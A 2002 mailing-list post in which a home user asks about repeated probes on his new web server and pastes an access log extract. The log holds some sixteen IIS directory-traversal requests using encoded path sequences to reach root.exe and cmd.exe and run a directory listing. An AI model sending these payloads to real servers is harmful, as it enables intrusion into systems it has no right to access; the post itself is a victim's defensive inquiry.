[plug] Anyone seen this particular attack pattern before?
Alan Graham
alan.graham at infonetsystems.com.au
Thu Jan 17 11:03:56 WST 2002
I've just set up a web server on my firewall, to show some photo's of the
kids to my folks in England. Within a few days, I started seeing this
attack. It comes in regularly, from a lot of different IP's, and it's
obviously aimed at NT IIS. Ha. I'm thinking it's a well known scripted
attack, or posibly a zombied attack? There's a pause of about 5 minutes
between each attack. The pisser is that most of the hosts appear to be
within iinet. I suppose I'd better let them know too.
Can anyone tell me any more about it?
Extract of access_log
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-"
"-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 321 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 321 "-" "-"
"GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
"-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
"-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
"-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
"-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
"-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-"
"-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
"-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-"
"-"
Regards
Alan Graham
More information about the plug
mailing list